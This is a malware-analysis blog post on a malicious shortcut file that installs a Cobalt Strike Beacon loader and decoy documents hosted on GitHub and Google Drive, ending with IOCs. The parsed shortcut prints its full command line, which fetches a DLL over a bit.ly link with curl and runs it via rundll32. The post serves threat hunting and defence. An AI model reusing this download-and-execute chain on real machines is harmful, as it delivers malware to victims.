Hunting Unknown RedTeam CobaltStrike Beacon

Introduction

Hello. I am morimolymoly.

I accidentally hunted unknown RedTeam's (I guess) CobaltStrike Beacon.

I tweeted this case in 2022.

Hunting

I hunted DPRK's CryptoMimic campaign with VirusTotal LiveHunt. However, different actor which uses similar TTPs had been caught accidentally.

www.virustotal.com

TTPs

CryptoMimic used malicous LNK file which has bitly link to malware. This TTP is similar to this case.

However, this threat actor abused GitHub and Google Drive.

This is funny point of this.

Analysis

I analyzed LNK file with LECmd.

LECmd version 1.5.0.0

Author: Eric Zimmerman (saericzimmerman@gmail.com)
https://github.com/EricZimmerman/LECmd

Command line: -f .\aaaaaa.lnk

Warning: Administrator privileges not found!


Processing C:\Users\moly\Desktop\lnk-bitly-221214\aaaaaa.lnk

Source file: C:\Users\moly\Desktop\lnk-bitly-221214\aaaaaa.lnk
  Source created:  2022-12-13 23:33:36
  Source modified: 2022-12-13 23:33:36
  Source accessed: 2022-12-13 23:33:36

--- Header ---
  Target created:  2022-10-21 16:53:41
  Target modified: 2022-10-21 16:53:41
  Target accessed: 2022-12-12 10:46:28

  File size: 236,544
  Flags: HasTargetIdList, HasLinkInfo, HasArguments, HasIconLocation, IsUnicode, HasExpString
  File attributes: FileAttributeArchive
  Icon index: 0
  Show window: SwNormal (Activates and displays the window. The window is restored to its original size and position if the window is minimized or maximized.)

Arguments: /c "start /B C:\"Program Files (x86)"\Microsoft\Edge\Application\msedge.exe --kiosk https://bit.ly/3Pkc8Kw & start /B C:\Windows\System32\curl.exe -s -L -o %temp%\t.dll https://bit.ly/3Fmt3aC & timeout 2 & rundll32 %temp%\t.dll,mydllmain"
Icon Location: %ProgramW6432%\Adobe\Acrobat DC\Acrobat\Acrobat.exe

--- Link information ---
Flags: VolumeIdAndLocalBasePath

>> Volume information
  Drive type: Fixed storage media (Hard drive)
  Serial number: 4843E915
  Label: (No label)
  Local path: C:\Windows\System32\cmd.exe

--- Target ID information (Format: Type ==> Value) ---

  Absolute path: My Computer\C:\\\

  -Root folder: GUID ==> My Computer

  -Drive letter ==> C:

  -Directory ==> (None)
    Short name: Windows
    Modified:    2022-12-12 10:01:44
    Extension block count: 1

    --------- Block 0 (Beef0004) ---------
    Long name: 
    Created:     2019-12-07 09:03:46
    Last access: 2022-12-12 10:01:44
    MFT entry/sequence #: 134345/125 (0x20CC9/0x7D)

  -Directory ==> (None)
    Short name: System32
    Modified:    2022-11-24 14:04:08
    Extension block count: 1

    --------- Block 0 (Beef0004) ---------
    Long name: 
    Created:     2019-12-07 09:03:46
    Last access: 2022-12-12 10:51:08
    MFT entry/sequence #: 207770/58 (0x32B9A/0x3A)

  -File ==> (None)
    Short name: cmd.exe
    Modified:    2022-10-21 16:53:42
    Extension block count: 1

    --------- Block 0 (Beef0004) ---------
    Long name: 
    Created:     2022-10-21 16:53:42
    Last access: 2022-12-12 10:46:30
    MFT entry/sequence #: 378353/49 (0x5C5F1/0x31)

--- End Target ID information ---

--- Extra blocks information ---

>> Environment variable data block
   Environment variables: %COMSPEC% 

>> Special folder data block
   Special Folder ID: 37

>> Known folder data block
   Known folder GUID: 1ac14e77-02e7-4e5d-b744-2eb1ae5198b7 ==> System32

>> Tracker database block
   Machine ID:  vm01
   MAC Address: 08:00:27:68:4d:30
   MAC Vendor:  PCS SYSTEMTECHNIK
   Creation:    2022-11-28 11:27:11

   Volume Droid:       66055d2a-26cb-4919-96d2-3aff711ffc8b
   Volume Droid Birth: 66055d2a-26cb-4919-96d2-3aff711ffc8b
   File Droid:         99cf2333-6f0f-11ed-b3f3-080027684d30
   File Droid birth:   99cf2333-6f0f-11ed-b3f3-080027684d30

>> Property store data block (Format: GUID\ID Description ==> Value)
   46588ae2-4cbc-4338-bbfc-139326986dce\4      SID                                 ==> S-1-5-21-2536987187-3715387138-3086421273-1001
   446d16b1-8dad-4870-a748-402ea43d788c\104    Volume Id                           ==> Unmapped GUID: 72f0c558-0000-0000-0000-501f00000000

This LNK file does download malware(DLL, t.dll) from bitly link and launch t.dll's mydllmain function.

It seems that naming is so cheap.

I guessed that this did not be done by BlueNoroff.

I stated to analyze malware itself.

Sample's VT is below.

www.virustotal.com

It create IE process and inject shellcode.

Shellcode is XORed as you can see.

I dumped shellcode with x64dbg.

Shellcode is below.

www.virustotal.com

I found interesting string from malware.(t.dll)

So I call this malware as SysLoader.

When you launch SysLoader, you can see decoy document file while shellcode(CobaltStrike Beacon) is running.

SysLoader is accessed by bitly's link but this was hosted by GitHub repo.

Web service abuse

Decoy document was hosted by Google Drive.

SysLoader was hosted by GitHub.

Maldoc is also hosted as you can see.

I did OleVba to this maldoc. It contains macro which download and kick SysLoader.

Here is commit log of repository.

I just want to see the traffic so I launched FakeNet-NG and see whats going on.

Then I realized this is CobaltStrike Beacon and profile is Pandora.

github.com

CobaltStrike Beacon's watermark is 546921291.

This watermark seems legit one. So I attributed this actor as some RedTeam. C2 server is located on AWS Japan Region. This does not make sence for APTs.

Summary

This actor seems some RedTeamer of some company.

Malware itself is so cheap to analyze.

There is no obfuscation or packer.

I guess Cobalt Strike Beacon is original and legit one from seeing watermark.

I think that this operation was done by some RedTeam to test it's TTPs.

IOCs

  • hxxps://github.com/encerepo/resources
  • 38.242.255[.]184
  • C2: dqfkmwvib0lbb[.]cloudfront[.]net
  • C2: 18.65.152[.]13